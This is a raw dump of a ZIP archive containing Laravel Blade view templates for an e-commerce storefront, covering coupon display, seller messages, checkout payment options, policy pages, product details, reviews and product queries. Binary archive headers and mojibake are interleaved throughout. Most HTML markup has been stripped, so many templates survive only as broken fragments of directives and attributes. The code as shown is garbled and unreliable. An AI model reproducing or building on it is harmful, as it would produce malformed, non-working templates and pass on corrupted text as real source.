    @if($coupon->type == 'product_base') @php $products = get_multiple_products($coupon_products); @endphp @elseif($coupon->type == 'cart_base') @if($coupon->discount_type == 'amount') {{ translate('Min Spend ') }} {{ single_price($coupon_discount->min_buy) }} {{ translate('from') }} {{ $name }} {{ translate('to get') }} {{ single_price($coupon->discount) }} {{ translate('OFF on total orders') }} @else {{ translate('Min Spend ') }} {{ single_price($coupon_discount->min_buy) }} {{ translate('from') }} {{ $name }} {{ translate('to get') }} {{ $coupon->discount }}% {{ translate('OFF on total orders') }} @endif @else @if($coupon->discount_type == 'amount') {{ single_price($coupon->discount) }} {{ translate('OFF on total orders within').' '.$coupon_discount->validation_days.' '.translate('days of registration') }} @else {{ $coupon->discount }}% {{ translate('OFF on total orders within').' '.$coupon_discount->validation_days.' '.translate('days of registration') }} @endif @endif
    {{ translate('Code') }}: {{ $coupon->code }}
    PK�N]j_�t��,views/frontend/partials/google_map.blade.phpnu�[��� PK�N]�/DN((.views/frontend/partials/image_viewer.blade.phpnu�[���PK�N]}&;@�!�!-views/frontend/partials/login_modal.blade.phpnu�[���PK�N]Fԟ� � *views/frontend/partials/messages.blade.phpnu�[���@foreach ($conversation->messages as $key => $message) @if ($message->user_id == Auth::user()->id)
    @if (Auth::user()->id != $message->user_id && $message->user->shop != null) @else user != null) src="{{ uploaded_asset($message->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif
    {{ $message->message }}
    {{ date('h:i:m d-m-Y', strtotime($message->created_at)) }}
    @else
    @if (Auth::user()->id != $message->user_id && $message->user->shop != null) @else user != null) src="{{ uploaded_asset($message->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif
    {{ $message->message }}
    {{ date('h:i:m d-m-Y', strtotime($message->created_at)) }}
    @endif @endforeach PK�N]�����4views/frontend/partials/minQtyNotSatisfied.blade.phpnu�[��� PK�N]�0�xD D 'views/frontend/partials/modal.blade.phpnu�[��� @if(!Auth::check()) @include('frontend.partials.login_modal') @endif PK�N]~�?[tt0views/frontend/partials/outOfStockCart.blade.phpnu�[��� PK�N]R,$��0views/frontend/partials/pick_up_points.blade.phpnu�[���
    {{translate('Select Nearest Pick-up Point')}}
    @php $admin_products = array(); $seller_products = array(); foreach (Session::get('cart') as $key => $cartItem){ if(get_single_product($cartItem['id'])->added_by == 'admin'){ array_push($admin_products, $cartItem['id']); } else{ $product_ids = array(); if(isset($seller_products[get_single_product($cartItem['id'])->user_id])){ $product_ids = $seller_products[get_single_product($cartItem['id'])->user_id]; } array_push($product_ids, $cartItem['id']); $seller_products[get_single_product($cartItem['id'])->user_id] = $product_ids; } } // dd($seller_products); @endphp @if (!empty($admin_products)) @foreach ($pick_up_points as $key => $pick_up_point) @endforeach @endif @if (!empty($seller_products)) @foreach ($seller_products as $key => $seller_product) @foreach ($seller_product as $key => $value) {{ $value }}
    @endforeach @endforeach @endif PK�N]p�od��2views/frontend/partials/price_variations.blade.phpnu�[��� @foreach(json_decode($subsubcategory->options) as $key=> $option)
    @if($option->type == 'radio' || $option->type == 'select') @foreach($option->options as $options)
    @endforeach @endif
    @endforeach PK�N]�*�t--:views/frontend/partials/product_query_pagination.blade.phpnu�[���
    {{ translate('Other Questions') }}
    @forelse ($product_queries as $product_query)
    {{ translate('Q') }}

    {{ strip_tags($product_query->question) }}

    {{ $product_query->user->name }}
    {{ translate('A') }} @php if($product_query->product->added_by == 'seller'){ $product_shop_name= $product_query->product->user->shop->name; }else{ $product_shop_name= get_setting('site_name'); } @endphp

    @if($product_query->reply) {{ strip_tags($product_query->reply) }} @else {{ translate('Seller did not respond yet') }} @endif

    {{ $product_shop_name }}
    @empty

    {{ translate('No queries have been asked to the seller yet') }}

    @endforelse
    {{ $product_queries->links() }}
    PK�N]���{��>views/frontend/partials/removeAuctionProductFromCart.blade.phpnu�[��� PK�N]~t�@@0views/frontend/partials/search_content.blade.phpnu�[���
    @if (sizeof($keywords) > 0)
    {{translate('Popular Suggestions')}}
    @endif
    @if (count($categories) > 0)
    {{translate('Category Suggestions')}}
    @endif
    @if (addon_is_activated('preorder') && count($preorder_products) > 0)
    {{translate('Preorder Products')}}
    @endif
    @if(get_setting('vendor_system_activation') == 1)
    @if (count($shops) > 0)
    {{translate('Shops')}}
    @endif
    @endif PK�N]�#NK K .views/frontend/partials/wallet_modal.blade.phpnu�[��� PK�N]�N\##*views/frontend/partials/wishlist.blade.phpnu�[��� @if(Auth::check()) @php $wishlistProductCount = get_wishlists()->count(); @endphp @if($wishlistProductCount > 0) {{ $wishlistProductCount}} @endif @endif PK�N]Tpv.views/frontend/partials/wishlistText.blade.phpnu�[��� {{ translate('Wishlist') }} @if(Auth::check()) @php $wishlistProductCount = get_wishlists()->count(); @endphp @if($wishlistProductCount > 0) ({{ $wishlistProductCount }}) @endif @endif      PK�N]� �..8views/frontend/partials/withdraw_message_modal.blade.phpnu�[��� PK�N]a�bV V Bviews/frontend/partials/payment_information/payment_info.blade.phpnu�[���@php $payment_count = Auth::user()->payment_informations->count(); @endphp @if (Auth::check())
    @foreach (Auth::user()->payment_informations as $key => $payment_information)
    @endforeach @if($payment_count < 2)
    {{ translate('Add New Payment Information') }}
    @endif
    @endifPK�N])p����Tviews/frontend/partials/payment_information/payment_information_edit_modal.blade.phpnu�[���
    {{ translate('Add Payment Information !') }}
    @php $bank_payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'bank_payment')->get(); $payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'others')->get(); @endphp
    PK�N]Lviews/frontend/partials/payment_information/payment_information_js.blade.phpnu�[���PK�N]�����Oviews/frontend/partials/payment_information/payment_information_modal.blade.phpnu�[���
    {{ translate('Add Payment Information !') }}
    @php $bank_payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'bank_payment')->get(); $payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'others')->get(); @endphp
    PK�N])p����Yviews/frontend/partials/payment_information/ajax_payment_information_edit_modal.blade.phpnu�[���
    {{ translate('Add Payment Information !') }}
    @php $bank_payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'bank_payment')->get(); $payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'others')->get(); @endphp
    PK�N]�����Tviews/frontend/partials/payment_information/ajax_payment_information_modal.blade.phpnu�[���
    {{ translate('Add Payment Information !') }}
    @php $bank_payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'bank_payment')->get(); $payment_methods = \App\Models\OfflinePayoutMethod::where('type', 'others')->get(); @endphp
    PK�N]T���xx0views/frontend/partials/mega_sub_items.blade.phpnu�[���@foreach ($categories as $cat) @php $cat_name = $cat->getTranslation('name'); $children = $cat->childrenCategories ?? collect(); @endphp
  • {{ $cat_name }}
  • @if ($children->count()) @include('frontend.partials.mega_sub_items', ['categories' => $children, 'depth' => $depth + 1]) @endif @endforeachPK�N]�I�vv.views/frontend/payhere/checkout_form.blade.phpnu�[��� PK�N]�� ��6views/frontend/payhere/customer_package_form.blade.phpnu�[��� PK�N]�� �||6views/frontend/payhere/order_re_payment_form.blade.phpnu�[��� PK�N]����}}4views/frontend/payhere/seller_package_form.blade.phpnu�[��� PK�N]��SS,views/frontend/payhere/wallet_form.blade.phpnu�[��� PK�N]�)�ii*views/frontend/payment/bkash_app.blade.phpnu�[���
    @if (get_setting('bkash_sandbox') == 1) @else @endif PK�N]WBy���'views/frontend/payment/iyzico.blade.phpnu�[��� IYZICO Payment {!! $content !!} PK�N]�_�%��,views/frontend/payment/mercadopago.blade.phpnu�[���@php require base_path('/vendor/autoload.php'); MercadoPago\SDK::setAccessToken(config('mercadopago.access')); $preference = new MercadoPago\Preference(); $payer = new MercadoPago\Payer(); $payer->name = $first_name; $payer->email = $email; $payer->phone = array( "area_code" => "", "number" => $phone ); // Crea un ítem en la preferencia $item = new MercadoPago\Item(); $item->title = $billname; $item->quantity = 1; $item->unit_price = $amount; $preference->payer = $payer; $preference->items = array($item); $preference->back_urls = array( "success" => $success_url, "failure" => $fail_url, "pending" => $fail_url ); $preference->save(); @endphp Mercadopago Payment

    PK�N]��I� � 'views/frontend/payment/stripe.blade.phpnu�[��� Stripe Payment


    Don't close the tab. The payment is being processed . . .

    PK�N]�|�� � +views/frontend/payment/stripe_app.blade.phpnu�[��� Stripe Payment


    Don't close the tab. The payment is being processed . . .

    PK�N]Nr!�!�'views/frontend/payment_select.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('1. My Cart') }}

    {{ translate('2. Shipping info') }}

    {{ translate('3. Delivery info') }}

    {{ translate('4. Payment') }}

    {{ translate('5. Confirmation') }}

    @csrf

    {{ translate('Any additional info?') }}

    {{ translate('Select a payment option') }}

    @if (get_setting('paypal_payment') == 1)
    @endif @if (get_setting('stripe_payment') == 1)
    @endif @if (get_setting('mercadopago_payment') == 1)
    @endif @if (get_setting('sslcommerz_payment') == 1)
    @endif @if (get_setting('instamojo_payment') == 1)
    @endif @if (get_setting('razorpay') == 1)
    @endif @if (get_setting('paystack') == 1)
    @endif @if (get_setting('voguepay') == 1)
    @endif @if (get_setting('payhere') == 1)
    @endif @if (get_setting('ngenius') == 1)
    @endif @if (get_setting('iyzico') == 1)
    @endif @if (get_setting('nagad') == 1)
    @endif @if (get_setting('bkash') == 1)
    @endif @if (get_setting('aamarpay') == 1)
    @endif @if (get_setting('authorizenet') == 1)
    @endif @if (get_setting('payku') == 1)
    @endif @if (addon_is_activated('african_pg')) @if (get_setting('flutterwave') == 1)
    @endif @if (get_setting('payfast') == 1)
    @endif @endif {{-- Asian Payment gateways --}} @if (addon_is_activated('paytm')) @if (get_setting('paytm_payment') == 1)
    @endif @if (get_setting('toyyibpay_payment') == 1)
    @endif @if (get_setting('myfatoorah') == 1)
    @endif @if (get_setting('khalti_payment') == 1)
    @endif @if (get_setting('phonepe_payment') == 1)
    @endif @endif @if (get_setting('paymob_payment') == 1)
    @endif @if (get_setting('cash_payment') == 1) @php $digital = 0; $cod_on = 1; foreach ($carts as $cartItem) { $product = get_single_product($cartItem['product_id']); if ($product['digital'] == 1) { $digital = 1; } if ($product['cash_on_delivery'] == 0) { $cod_on = 0; } } @endphp @if ($digital != 1 && $cod_on == 1)
    @endif @endif @if (Auth::check()) @if (addon_is_activated('offline_payment')) @foreach (get_all_manual_payment_methods() as $method)
    @endforeach @foreach (get_all_manual_payment_methods() as $method)
    @php echo $method->description @endphp @if ($method->bank_info != null)
      @foreach (json_decode($method->bank_info) as $key => $info)
    • {{ translate('Bank Name') }} - {{ $info->bank_name }}, {{ translate('Account Name') }} - {{ $info->account_name }}, {{ translate('Account Number') }} - {{ $info->account_number }}, {{ translate('Routing Number') }} - {{ $info->routing_number }}
    • @endforeach
    @endif
    @endforeach @endif @endif
    @if (addon_is_activated('offline_payment'))

    {{ translate('Browse') }}
    {{ translate('Choose image') }}
    @endif @if (Auth::check() && get_setting('wallet_system') == 1)
    {{ translate('Or, Your wallet balance :') }} {{ single_price(Auth::user()->balance) }}
    @if (Auth::user()->balance < $total) @else @endif
    @endif
    @include('frontend.partials.cart_summary')
    @endsection @section('script') @endsection PK�N]5��b b /views/frontend/policies/privacypolicy.blade.phpnu�[���@php $layout = 'frontend.layouts.app'; if (addon_is_activated('portfolio_system')) { $user = auth()->user(); if ( !$user || $user->verification_status == 0 || optional($user->shop)->verification_status == 0 ) { $layout = 'frontend.layouts.portfolio_app'; } } @endphp @extends($layout) @section('meta_title'){{ $page->meta_title }}@stop @section('meta_description'){{ $page->meta_description }}@stop @section('meta_keywords'){{ $page->tags }}@stop @section('meta') @endsection @section('content')

    {{ $page->getTranslation('title') }}

    @php echo $page->getTranslation('content'); @endphp
    @endsection PK�N]�auser(); if ( !$user || $user->verification_status == 0 || optional($user->shop)->verification_status == 0 ) { $layout = 'frontend.layouts.portfolio_app'; } } @endphp @extends($layout) @section('meta_title'){{ $page->meta_title }}@stop @section('meta_description'){{ $page->meta_description }}@stop @section('meta_keywords'){{ $page->tags }}@stop @section('meta') @endsection @section('content')

    {{ $page->getTranslation('title') }}

    @php echo $page->getTranslation('content'); @endphp
    @endsection PK�N]֥�( ( .views/frontend/policies/sellerpolicy.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $page->meta_title }}@stop @section('meta_description'){{ $page->meta_description }}@stop @section('meta_keywords'){{ $page->tags }}@stop @section('meta') @endsection @section('content')

    {{ $page->getTranslation('title') }}

    @php echo $page->getTranslation('content'); @endphp
    @endsection PK�N]*ag�b b /views/frontend/policies/supportpolicy.blade.phpnu�[���@php $layout = 'frontend.layouts.app'; if (addon_is_activated('portfolio_system')) { $user = auth()->user(); if ( !$user || $user->verification_status == 0 || optional($user->shop)->verification_status == 0 ) { $layout = 'frontend.layouts.portfolio_app'; } } @endphp @extends($layout) @section('meta_title'){{ $page->meta_title }}@stop @section('meta_description'){{ $page->meta_description }}@stop @section('meta_keywords'){{ $page->tags }}@stop @section('meta') @endsection @section('content')

    {{ $page->getTranslation('title') }}

    @php echo $page->getTranslation('content'); @endphp
    @endsection PK�N]M�+� � 'views/frontend/policies/terms.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $page->meta_title }}@stop @section('meta_description'){{ $page->meta_description }}@stop @section('meta_keywords'){{ $page->tags }}@stop @section('meta') @endsection @section('content')

    {{ $page->getTranslation('title') }}

    @php echo $page->getTranslation('content'); @endphp
    @endsection PK�N]=�Җ0�05views/frontend/product_box_for_listing_page.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]����4views/frontend/product_details/description.blade.phpnu�[���
    getTranslation('description'); ?>
    PK�N]�ݨ���0views/frontend/product_details/details.blade.phpnu�[���
    @php $seller_logo = $detailedProduct->user->shop?->logo ? $detailedProduct->user->shop->logo : (json_decode(get_setting('business_info'), true) ?? [])['shop_logo'] ?? null; @endphp @if ($detailedProduct->auction_product != 1)
    @endif

    {{ $detailedProduct->getTranslation('name') }}

    @if ($detailedProduct->brand != null)
    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}
    @endif @if(get_setting('product_query_activation') == 1) @endif
    @php $total = 0; $total += $detailedProduct->reviews->where('status', 1)->count(); @endphp
    {{ renderStarRating($detailedProduct->rating) }}
    {{ $detailedProduct->rating }} /{{ translate('5.0') }} ({{ $total }} {{ translate('reviews') }})
    @if ($detailedProduct->variant_product)
    {{translate('SKU')}}
    @elseif (($detailedProduct->stocks->first()->sku))
    {{translate('SKU')}} {{($detailedProduct->stocks->first()->sku)}}
    @endif
    @if(get_setting('show_custom_product_visitors')==1)
    {{ translate('People are viewing right now')}}
    @endif
    @if ($detailedProduct->auction_product) {{ translate('Bided')}} {{$detailedProduct->bids()->count()}} @else {{-- {{ translate('Total Ordered')}} {{$detailedProduct->orderDetails()->count()}} --}} @endif
    @if($detailedProduct->todays_deal)
    {{ translate('Todays Deal')}} {{ translate('Exclusive for today only')}}
    @endif @php $flashDealEndDate = get_product_active_flash_deal_end_date($detailedProduct->id, $detailedProduct->discount_end_date); $flashDealnotEnd = !is_null($flashDealEndDate); @endphp @if($flashDealnotEnd)
    {{translate('Flash Sale')}}
    {{ translate('Loading...')}}
    @endif
    @if ($detailedProduct->auction_product)

    {{ translate('Auction Status') }}

    {{ translate('Auction Will End') }}
    @if ($detailedProduct->auction_end_date > strtotime('now'))
    @else

    {{ translate('Ended') }}

    @endif
    {{ translate('Starting Bid') }}
    {{ single_price($detailedProduct->starting_bid) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    {{ translate('Highest Bid') }}
    @php $highest_bid = $detailedProduct->bids->max('amount'); @endphp @if ($highest_bid != null) {{ single_price($highest_bid) }} @endif
    @php $highest_bid = $detailedProduct->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $detailedProduct->starting_bid; $gst_rate = gst_applicable_product_rate($detailedProduct->id); @endphp @if ($detailedProduct->auction_end_date >= strtotime('now'))
    @if (Auth::check() && $detailedProduct->user_id == Auth::user()->id) {{ translate('Seller cannot Place Bid to His Own Product') }} @else @endif
    @endif @if ($detailedProduct->est_shipping_days && $detailedProduct->show_estimated_shipping_time ==1)

    {{ translate('Estimate Shipping Time') }} {{ $detailedProduct->est_shipping_days }} {{ translate('Days') }}

    @endif
    seller
    @if ($detailedProduct->added_by == 'seller' && get_setting('vendor_system_activation') == 1)

    {{ translate('Sold by') }} {{ $detailedProduct->user->shop->name }}

    @else

    {{ translate('Inhouse product') }}

    @endif @if (get_setting('conversation_system') == 1) {{ translate('Message Seller') }} @endif
    @if ($detailedProduct->brand != null)
    {{ $detailedProduct->brand->name }}

    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}

    {{ translate('Products from this brand') }}
    @endif
      @if ($detailedProduct->cash_on_delivery)
    • warranty check circle {{ translate('Cash on Delivery Available')}}
    • @endif @if ($detailedProduct->shipping_type == 'free')
    • warranty check circle {{ translate('Free Shipping') }}
    • @endif
    @else
    @csrf
    {{ translate('Pricing') }}
    @if ($detailedProduct->digital == 0)
    {{ home_discounted_price($detailedProduct) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    @if (home_price($detailedProduct) != home_discounted_price($detailedProduct)) {{ home_price($detailedProduct) }} @endif
    @if ($detailedProduct->pdf != null) {{ translate('Download product specifation') }} @endif
    @else
    {{ home_discounted_price($detailedProduct) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    @if (home_price($detailedProduct) != home_discounted_price($detailedProduct)) {{ home_price($detailedProduct) }} @endif
    @endif @if (discount_in_percentage($detailedProduct) > 0 || (addon_is_activated('club_point') && $detailedProduct->earn_point > 0))
    @if (discount_in_percentage($detailedProduct) > 0 && (home_price($detailedProduct) != home_discounted_price($detailedProduct))) -{{ discount_in_percentage($detailedProduct) }}% @endif @if (addon_is_activated('club_point') && $detailedProduct->earn_point > 0) {{ translate('Club Point') }}: {{ $detailedProduct->earn_point }} @endif
    @endif
    @if ($detailedProduct->wholesale_product == 1)
    @foreach ($detailedProduct->stocks->first()->wholesalePrices as $wholesalePrice) @endforeach
    {{ translate('Min Qty') }} {{ translate('Max Qty') }} {{ translate('Unit Price') }}
    {{ $wholesalePrice->min_qty }} {{ $wholesalePrice->max_qty }} {{ single_price($wholesalePrice->price) }}
    @else @if ($detailedProduct->variant_product) @php $colorCount = ($detailedProduct->colors && count(json_decode($detailedProduct->colors)) > 0) ? 1 : 0; $choiceCount = collect(json_decode($detailedProduct->choice_options ?? '[]', true))->count(); $product_variations = $colorCount + $choiceCount; @endphp
    {{translate('Variation')}}
    @php $sizeChartId = ($detailedProduct->main_category && $detailedProduct->main_category->sizeChart) ? $detailedProduct->main_category->sizeChart->id : 0; $sizeChartName = ($detailedProduct->main_category && $detailedProduct->main_category->sizeChart) ? $detailedProduct->main_category->sizeChart->name : null; @endphp @if($sizeChartId != 0)
    @endif
    @endif @endif @if (((get_setting('product_external_link_for_seller') == 1) && ($detailedProduct->added_by == "seller") && ($detailedProduct->external_link != null)) || (($detailedProduct->added_by != "seller") && ($detailedProduct->external_link != null))) @else
    @if ($detailedProduct->digital == 0)
    @else @endif
    @if ($detailedProduct->digital ==0) @php $qty = 0; foreach ($detailedProduct->stocks as $key => $stock) { $qty += $stock->qty; } @endphp

    @if ($detailedProduct->stock_visibility_state == 'quantity') {{ $qty }} {{translate('Available')}} @elseif($detailedProduct->stock_visibility_state == 'text' && $qty >= 1) {{translate('In Stock')}} @endif

    {{translate('Minimum order qty')}} {{ $detailedProduct->min_qty }}

    @endif
    @if ($detailedProduct->digital ==0)
    {{ translate('QTY')}}
    @endif @if (get_setting('whatsapp_order') == 1) @php $storeName = env('APP_NAME'); $productTitle = $detailedProduct->getTranslation('name'); $productUrl = URL::to('/product') . '/' . $detailedProduct->slug; $template = get_setting('order_messege_template'); $message = str_replace( ['[[storeName]]', '[[productTitle]]', '[[productUrl]]'], [$storeName, $productTitle, $productUrl], $template ); $whatsappNumber = preg_replace('/[^0-9]/', '', env('WHATSAPP_NUMBER')); $whatsappUrl = "https://wa.me/{$whatsappNumber}?text=" . urlencode($message); @endphp @if (($detailedProduct->added_by == 'seller' && get_setting('whatsapp_order_seller_prods') == 1) || ($detailedProduct->added_by == 'admin')) @endif @endif
    @if($detailedProduct->variant_product)

    {{translate('Selected Product Summery')}}

    {{ strlen($detailedProduct->getTranslation('name')) > 120 ? substr($detailedProduct->getTranslation('name'), 0, 120).'...' : $detailedProduct->getTranslation('name') }} -
    @endif
    @endif @if ($detailedProduct->est_shipping_days && $detailedProduct->show_estimated_shipping_time ==1)

    {{ translate('Estimate Shipping Time') }} {{ $detailedProduct->est_shipping_days }} {{ translate('Days') }} @if($detailedProduct->show_shipping_note==1) @endif

    @endif
    seller
    @if ($detailedProduct->added_by == 'seller' && get_setting('vendor_system_activation') == 1)

    {{ translate('Sold by') }} {{ $detailedProduct->user->shop->name }}

    @else

    {{ translate('Inhouse product') }}

    @endif @if (get_setting('conversation_system') == 1) {{ translate('Message Seller') }} @endif
    @if ($detailedProduct->brand != null)
    {{ $detailedProduct->brand->name }}

    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}

    {{ translate('Products from this brand') }}
    @endif
    @if ($detailedProduct->has_warranty == 1 && $detailedProduct->warranty_id != null)

    {{ translate('Warranty') }}

    {{ translate('This Product has') }} {{ $detailedProduct->warranty->getTranslation('text')}} {{ translate('warranty') }}

    @if($detailedProduct->warranty_note_id != null && $detailedProduct->show_warranty_note == 1) {{ translate('View Details') }} @endif
    Warranty Circle
    @endif
      @if ($detailedProduct->cash_on_delivery)
    • warranty check circle {{ translate('Cash on Delivery Available')}} @if($detailedProduct->show_delivery_notes==1 && $detailedProduct->delivery_note_id ) @endif
    • @endif @if ($detailedProduct->shipping_type == 'free')
    • warranty check circle {{ translate('Free Shipping') }}
    • @endif @if (addon_is_activated('refund_request') && $detailedProduct->refundable == 1)
    • warranty check circle {{ translate('Refund Available for this producte') }}
    • @endif
    @php $refund_sticker = get_setting('refund_sticker'); @endphp @if (addon_is_activated('refund_request') && $detailedProduct->refundable == 1) @endif
    @if (((get_setting('product_external_link_for_seller') == 1) && ($detailedProduct->added_by == "seller") && ($detailedProduct->external_link != null)) || (($detailedProduct->added_by != "seller") && ($detailedProduct->external_link != null))) @endif @if (Auth::check() && addon_is_activated('affiliate_system') && get_affliate_option_status() && Auth::user()->affiliate_user != null && Auth::user()->affiliate_user->status) @php if (Auth::check()) { if (Auth::user()->referral_code == null) { Auth::user()->referral_code = substr(Auth::user()->id . Str::random(10), 0, 10); Auth::user()->save(); } $referral_code = Auth::user()->referral_code; $referral_code_url = URL::to('/product') . '/' . $detailedProduct->slug . "?product_referral_code=$referral_code"; } @endphp
    @endif @endif
    PK�N]�s� Cviews/frontend/product_details/frequently_bought_products.blade.phpnu�[���

    {{ translate('Frequently Bought Products') }}

    PK�N]�@� Dviews/frontend/product_details/frequently_brought_products.blade.phpnu�[���

    {{ translate('Frequently Bought Products') }}

    PK�N]���Հ+�+6views/frontend/product_details/image_gallery.blade.phpnu�[���@php $photos = $detailedProduct->photos != null ? explode(',', $detailedProduct->photos) : []; $videos = $detailedProduct->video_link; $short_video = $detailedProduct->short_video != null ? explode(',', $detailedProduct->short_video) : []; $short_video_thumb = $detailedProduct->short_video != null ? explode(',', $detailedProduct->short_video_thumbnail) : []; $total_gallery= count($photos) +count($short_video) + (is_iterable($videos) ? count($videos) : 0); @endphp
    @if ($detailedProduct->digital == 0) @if($detailedProduct->stocks && $detailedProduct->stocks->count()) @foreach ($detailedProduct->stocks as $key => $stock) @if ($stock->image != null)
    @endif @endforeach @endif @endif @foreach ($photos as $key => $photo)
    @endforeach @foreach ($short_video as $index => $video)
    @endforeach @if (!empty($videos) && is_iterable($videos)) @foreach ($videos as $video) @php $youtube_id = youtubeVideoId($video); $youtube_thumb = 'https://img.youtube.com/vi/' . $youtube_id . '/hqdefault.jpg'; @endphp
    @endforeach @endif
    @if($total_gallery > 6)
    @endif
    {{-- variant in digital ==0 --}} @if ($detailedProduct->digital == 0) @if($detailedProduct->stocks && $detailedProduct->stocks->count()) @foreach ($detailedProduct->stocks as $key => $stock) @if ($stock->image != null) @endif @endforeach @endif @endif @foreach ($photos as $key => $photo) @endforeach @foreach ($short_video as $index => $video)
    @endforeach @if (!empty($videos) && is_iterable($videos)) @foreach ($videos as $video)
    @endforeach @endif
    PK�N]���}��8views/frontend/product_details/product_queries.blade.phpnu�[���@if(get_setting('product_query_activation') == 1)

    {{ translate(' Product Queries ') }} ({{ count($detailedProduct->product_queries) }})

    @guest

    {{ translate('Login') }} {{ translate('or') }} {{ translate('Register ') }}{{ translate(' to submit your questions to seller') }} {{-- href="{{ route('user.registration') }}">{{ translate('Register ') }}{{ translate(' to submit your questions to seller') }} --}}

    @endguest @auth
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @php $own_product_queries = $detailedProduct->product_queries->where('customer_id', Auth::id()); @endphp @if ($own_product_queries->count() > 0)
    {{ translate('My Questions') }}
    @foreach ($own_product_queries as $product_query)
    {{ translate('Q') }}

    {{ strip_tags($product_query->question) }}

    {{ $product_query->user->name }}
    {{ translate('A') }} @php if($detailedProduct->added_by == 'seller'){ $product_shop_name= $detailedProduct->user->shop->name; }else{ $product_shop_name= get_setting('site_name'); } @endphp

    @if($product_query->reply) {{ strip_tags($product_query->reply) }} @else {{ translate('Seller did not respond yet') }} @endif

    {{ $product_shop_name }}
    @endforeach
    @endif @endauth
    @include('frontend.partials.product_query_pagination')
    @endif PK�N]�}�@��0views/frontend/product_details/reviews.blade.phpnu�[���
    @foreach ($reviews as $key => $review) @php $customerName = null; $customerAvatar = null; if($review->type == "real"){ $customerName = $review->user != null ? $review->user->name : translate('Use is Not Available'); $customerAvatar = $review->user != null ? uploaded_asset($review->user->avatar_original) : static_asset('assets/img/placeholder.jpg'); } else{ $customerName = $review->custom_reviewer_name; $customerAvatar = uploaded_asset($review->custom_reviewer_image); } @endphp
    {{ $customerName }}

    {{ $customerName }}

    {{ date('d-m-Y', strtotime($review->created_at)) }}
    @for ($i = 0; $i < $review->rating; $i++) @endfor @for ($i = 0; $i < 5 - $review->rating; $i++) @endfor
    {{ $review->comment }}
    @if($review->photos != null) @foreach (explode(',', $review->photos) as $photo) @endforeach @endif
    @php $OrderDetail = get_order_details_by_review($review); @endphp @if ($OrderDetail && $OrderDetail->variation) {{ translate('Variation :') }} {{ $OrderDetail->variation }} @endif
    @endforeach
    PK�N]~"o�*5*57views/frontend/product_details/review_section.blade.phpnu�[���

    {{ translate('Reviews & Ratings') }}

    {{ number_format($detailedProduct->rating, 1) }}

    {{ renderStarRating($detailedProduct->rating) }}
    @php $total = 0; $total += $detailedProduct->reviews->where('status', 1)->count(); @endphp

    {{ translate('Total Review') }} {{ $total }}

    @if($detailedProduct->reviews()->where('status', 1)->count() > 0)
    {{ translate('Filter by Star Rating') }}
    {{-- sort by images btn --}}
    @else
    {{ translate('No reviews found!') }}
    @endif {{--@include('frontend.product_details.reviews')--}}
    @if($detailedProduct->reviews()->count() > 3)
    @endif
    PK�N]�pңXX4views/frontend/product_details/seller_info.blade.phpnu�[���@if ($detailedProduct->added_by == 'seller' && $detailedProduct->user->shop != null)
    {{ translate('Seller') }}
    @if ($detailedProduct->added_by == 'seller' && get_setting('vendor_system_activation') == 1) @endif
    {{ renderStarRating($detailedProduct->user->shop->rating) }}
    ({{ $detailedProduct->user->shop->num_of_reviews }} {{ translate('customer reviews') }})
    @if ($detailedProduct->user->shop->facebook || $detailedProduct->user->shop->google || $detailedProduct->user->shop->twitter || $detailedProduct->user->shop->youtube)
    @endif
    @endif PK�N]$&��} } =views/frontend/product_details/top_selling_products.blade.phpnu�[���
    {{ translate('Top Selling Products') }}
      @foreach (get_best_selling_products(6, $detailedProduct->user_id) as $key => $top_product)
    • {{ home_discounted_base_price($top_product) }} @if(home_price($top_product) != home_discounted_price($top_product)) {{ home_price($top_product) }} @endif
